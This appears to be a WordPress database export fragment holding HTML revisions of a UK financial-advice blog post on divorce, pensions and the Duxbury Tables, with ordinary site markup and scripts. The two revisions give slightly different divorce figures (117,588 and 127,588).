class=\"wpb_wrapper\">\r\n\r\n&nbsp;\r\n<h2> Fast Facts</h2>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nFinancial planning associated with divorce is not going to become any easier – and it’s one of those areas where you need to take action sooner rather than later.\r\n\r\n&nbsp;\r\n\r\n#1: Divorce rates increasing\r\n\r\nThe ONS estimates that 42% of marriages now end in divorce, 117,588 divorces in England and Wales and the figure for Scotland 9,814.\r\n\r\n&nbsp;\r\n\r\n<span style=\"line-height: 1.5em;\">#2: More need for financial advice\r\n</span>The longer a couple have been together the more complicated divorce proceedings are likely to be\r\n\r\n&nbsp;\r\n\r\n<span style=\"line-height: 1.5em;\">#3 Pension settlement\r\n</span>Once pensions are brought into the divorce proceedings  they can outstrip the value of the family home.\r\n\r\n&nbsp;\r\n\r\n#4: Duxbury tables\r\n\r\nTraditionally, solicitors have relied on the Duxbury Tables, (drawn up by Mrs Duxbury’s accountant 1992)\r\n\r\n&nbsp;\r\n\r\n#5: The world has changed since 1992\r\n\r\nWe have some serious doubts regarding these tables, and yet they are still being relied on in many of the divorce cases that we see\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"meta-info\">\r\n\r\n&nbsp;\r\n<div class=\"vcard\">\r\nBy <span class=\"sep\">|</span>Categories: <a title=\"View all posts in Pensions\" href=\"../category/pensions/\" rel=\"category tag\">Pensions</a>, <a title=\"View all posts in Wealth Management\" href=\"../category/wealth-management/\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a title=\"Comment on Financial Planning for Divorcees\" href=\"../financial-planning-divorcees/\">0 Comments</a></div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"share-box\">\r\n\r\n&nbsp;\r\n<h4></h4>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"facebook\">\r\n<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/financial-planning-divorcees/&amp;p[title]=Financial%20Planning%20for%20Divorcees\" target=\"_blank\" rel=\"nofollow\">\r\nFacebook\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nFacebook\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"twitter\">\r\n<a href=\"http://twitter.com/home?status=Financial+Planning+for+Divorcees%20http://www.equalitywalk.org.uk/financial-planning-divorcees/\" target=\"_blank\" rel=\"nofollow\">\r\nTwitter\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"linkedin\">\r\n<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/financial-planning-divorcees/&amp;title=Financial%20Planning%20for%20Divorcees\" target=\"_blank\" rel=\"nofollow\">\r\nLinkedIn\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nLinkedIn\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"reddit\">\r\n<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/financial-planning-divorcees/&amp;title=Financial%20Planning%20for%20Divorcees\" target=\"_blank\" rel=\"nofollow\">\r\nReddit\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nReddit\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tumblr\">\r\n<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Ffinancial-planning-divorcees%2F&amp;name=Financial+Planning+for+Divorcees&amp;description=Financial+planning+associated+with+divorce+is+not+going+to+become+any+easier+%E2%80%93+and+it%E2%80%99s+one+of+those+areas+where+you+need+to+take+action+sooner+rather+than+later.\" target=\"_blank\" rel=\"nofollow\">\r\nTumblr\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTumblr\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"google\">\r\n<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/financial-planning-divorcees/\" target=\"_blank\" rel=\"nofollow\">\r\nGoogle +1\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nGoogle +1\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"tf-pinterest\">\r\n<a href=\"#\">\r\nPinterest\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nPinterest\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"email\">\r\n<a href=\"mailto:?subject=Financial Planning for Divorcees&amp;body=http://www.equalitywalk.org.uk/financial-planning-divorcees/\">\r\nEmail\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nEmail\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author\">\r\n\r\n&nbsp;\r\n<div class=\"title\">\r\n<h2>About the Author:</h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n&nbsp;\r\n<div class=\"about-author-container\"></div>\r\n&nbsp;\r\n\r\n</div>\r\n<!-- You can start editing here. -->\r\n\r\n\r\n<!-- If comments are open, but there are no comments. -->\r\n<div id=\"respond\" class=\"comment-respond\">\r\n\r\n&nbsp;\r\n<div class=\"title\">\r\n<h2></h2>\r\n<div class=\"title-sep-container\"></div>\r\n</div>\r\n<small><a id=\"cancel-comment-reply-link\" style=\"display: none;\" href=\"../financial-planning-divorcees/\" rel=\"nofollow\">Cancel reply</a></small>\r\n\r\n<form id=\"commentform\" class=\"comment-form\" action=\"/\" method=\"post\">&nbsp;\r\n<div id=\"comment-input\"><input id=\"author\" class=\"input-name\" tabindex=\"1\" name=\"author\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Name (required)\" /><input id=\"email\" class=\"input-email\" tabindex=\"2\" name=\"email\" size=\"22\" type=\"text\" value=\"\" placeholder=\"Email (required)\" /></div>\r\n&nbsp;\r\n<div id=\"comment-textarea\"></div>\r\n<p class=\"form-submit\">\r\n<input id=\"comment-submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"8091\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"9de053ebf4\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"ak_js\" name=\"ak_js\" type=\"hidden\" value=\"115\" /></p>\r\n&nbsp;\r\n\r\n</form></div>\r\n<!-- #respond -->\r\n<script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function () { jQuery(\'#commentform\').submit(function () { _gaq.push( [\'_setAccount\', \'UA-10958181-3\'], [\'_trackEvent\', \'comment\', \'submit\'] ); }); }); ]]></script>\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div id=\"sidebar\" style=\"display: none;\">\r\n\r\n&nbsp;\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big>\r\n\r\npeople who get our best financial wisdom on a weekly basis.</center>\r\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>\r\n<p>&#13;\r\n		</div>\r\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\">\r\n<div class=\"heading\">\r\n<p>New Guides</p>\r\n</div>\r\n<div class=\"recent-works-items clearfix\">&#13;\r\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\r\n					</a>&#13;\r\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\r\n					</a>&#13;\r\n				</div>\r\n<p>&#13;\r\n&#13;\r\n		</div>\r\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">\r\n<div class=\"tab-holder\"><p>&#13;\r\n			</p>\r\n<div class=\"tab-hold tabs-wrapper\"><p>&#13;\r\n				</p>\r\n<ul id=\"tabs\" class=\"tabset tabs\">\r\n<li><a href=\"#tab-popular\">Popular</a></li>\r\n<p>&#13;\r\n															</p>\r\n<li><a href=\"#tab-recent\">Recent</a></li>\r\n<p>&#13;\r\n														</ul>\r\n<div class=\"tab-box tabs-container\"><p>&#13;\r\n										</p>\r\n<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\"><p>&#13;\r\n												</p>\r\n<ul class=\"news-list\">\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										October 12th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../best-annuity-rates/\">&#13;\r\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										March 21st, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										September 10th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\r\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										September 18th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										September 5th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n													</ul>\r\n</div>\r\n<p>&#13;\r\n															</p>\r\n<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\"><p>&#13;\r\n												</p>\r\n<ul class=\"news-list\">\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										June 10th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../5-facts-know-annuities/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										June 9th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n													</ul>\r\n</div>\r\n<p>&#13;\r\n														</div>\r\n<p>&#13;\r\n			</div>\r\n<p>&#13;\r\n		</div>\r\n<p>&#13;\r\n		</div>\r\n<div id=\"categories-3\" class=\"widget widget_categories\">\r\n<div class=\"heading\">\r\n<p>Post Categories</p>\r\n</div>\r\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></a></div>\r\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\r\n<div class=\"heading\">\r\n\r\nGet Social\r\n\r\n</div>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"rss\">\r\n<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nRSS\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"twitter\">\r\n<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n<div id=\"text-23\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>\r\n<p>&#13;\r\n		</div>\r\n</div>\r\n<p>&#13;\r\n		</div>\r\n<p>&#13;\r\n	</div>\r\n<p>&#13;\r\n				</p>\r\n<footer class=\"footer-area\">\r\n<div class=\"avada-row\"><p>&#13;\r\n			</p>\r\n<section class=\"columns columns-3\">\r\n<article class=\"col\">\r\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">\r\n<p>Our Latest Posts</p>\r\n<ul>\r\n<li>&#13;\r\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n					</p>\r\n<li>&#13;\r\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n					</p>\r\n<li>&#13;\r\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n					</p>\r\n<li>&#13;\r\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n				</ul>\r\n<div style=\"clear:both;\"/></div>\r\n</article>\r\n<article class=\"col\">\r\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\">\r\n<p>Contact Info</p>\r\n<div class=\"contact-info-container\"><p>&#13;\r\n				</p>\r\n<p class=\"address\">Manchester &amp; London</p>\r\n<p>&#13;\r\n		&#13;\r\n				</p>\r\n<p class=\"phone\">Phone: </p>\r\n<p>&#13;\r\n		&#13;\r\n		&#13;\r\n		&#13;\r\n				</p>\r\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\r\n<p>&#13;\r\n		&#13;\r\n				&#13;\r\n				</div>\r\n<p>&#13;\r\n		</p>\r\n<div style=\"clear:both;\"/></div>\r\n</article>\r\n<article class=\"col\">\r\n<div style=\"clear:both;\"/></article>\r\n</section>\r\n</div>\r\n<p>				&#13;\r\n&#13;\r\n				</p>\r\n<article class=\"col last\"/></footer>\r\n</div>\r\n<p>&#13;\r\n	&#13;\r\n			</p>\r\n<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[ jQuery(window).load(function() { jQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\" , animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true}); }); ]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n<script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body></p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Financial Planning for Divorcees','Financial planning associated with divorce is not going to get any easier, it’s one of those areas where you need to take action sooner rather than later.','inherit','closed','closed','','65-revision-v1','','','2017-09-21 17:24:32','2017-09-21 17:24:32','',65,'http://www.equalitywalk.org.uk/65-revision-v1',0,'revision','',0),(319,1,'2017-09-21 17:25:56','2017-09-21 17:25:56','\r\n<b>“Til Divorce Do Us Part”</b>\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n<div class=\"wpb_wrapper\">In February last year the Office for National Statistics released some depressing figures: <span style=\"font-size: 1.17em;\">The ONS estimates that 42% of marriages now end in divorce </span><span style=\"font-size: 1.17em;\">34% of marriages are expected to end in divorce by the 20</span><sup>th</sup><span style=\"font-size: 1.17em;\"><span style=\"font-size: 1.17em;\"> wedding anniversary </span></span>\r\n<span style=\"font-size: 1.17em;\">The greatest chance of divorce is between the 4</span><sup>th</sup><span style=\"font-size: 1.17em;\"> and 8</span><sup>th</sup><span style=\"font-size: 1.17em;\"> wedding anniversaries</span><span style=\"line-height: 1.5em;\"><img class=\"size-medium wp-image-215 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/file3251255366828-193x300.jpg\" alt=\"\" width=\"193\" height=\"300\" />In 2017 there were 127,588 divorces in England and Wales: the comparable figure for Scotland (from the Registrar General) was 9,814.</span> The Scottish figure was the lowest for thirty years – so on the face of it the trend may be reversing. Sadly, that is almost certainly <i>not </i>the case.\r\n\r\nIt is widely accepted that the recession means that many couples who wanted to divorce simply couldn’t afford it – in some cases couples are even having to continue living together after they’ve taken the decision to divorce. But with the economy now improving we will almost certainly see an upturn in the divorce statistics.\r\n\r\nNo-one gets married with the intention of splitting up – but as the figures show, all too often a marriage ends with the couple going their separate ways. If the divorce happens at a relatively young age and there are no children involved then it can be a simple process. If that’s the case with you, this <span style=\"color: #0000ff;\"><a href=\"http://www.resolution.org.uk/\"><span style=\"color: #0000ff;\">website could be useful</span></a>.</span>\r\n\r\nHowever, the longer a couple have been together the more complicated divorce proceedings are likely to be – and the more there will be a need for financial planning advice.\r\n\r\nThis is particularly true once pensions are brought into the divorce proceedings – and this trend will only increase with the Government’s drive to make sure that everyone is ultimately enrolled in a workplace pension.\r\n\r\nThe value of a pension – especially if someone is in a public sector pension scheme – can run into hundreds of thousands of pounds and it can outstrip the value of the family home as the main asset a couple own.\r\n\r\nIn our experience it is still the case the pensions are all too often not valued properly in divorce proceedings, leading to one of the couple – and it is invariably the wife – being ‘short-changed.’\r\n\r\nThe financial calculations involved in divorce proceedings are being further complicated by increasing life expectancy.\r\n\r\nTraditionally, solicitors have relied on the Duxbury Tables, particularly where divorce occurs in later life and one partner is to receive a lump sum which is intended to support him or her for the rest of their life.\r\n\r\n&nbsp;\r\n\r\nHowever these tables  were drawn up in 1992 (by Mrs Duxbury’s accountant) and life expectancy has increased significantly since then. Equally importantly, accepted rates of growth on investments have <i>decreased</i> significantly.\r\n\r\n&nbsp;\r\n\r\nWe have some serious doubts regarding these tables, and yet they are still being relied on in 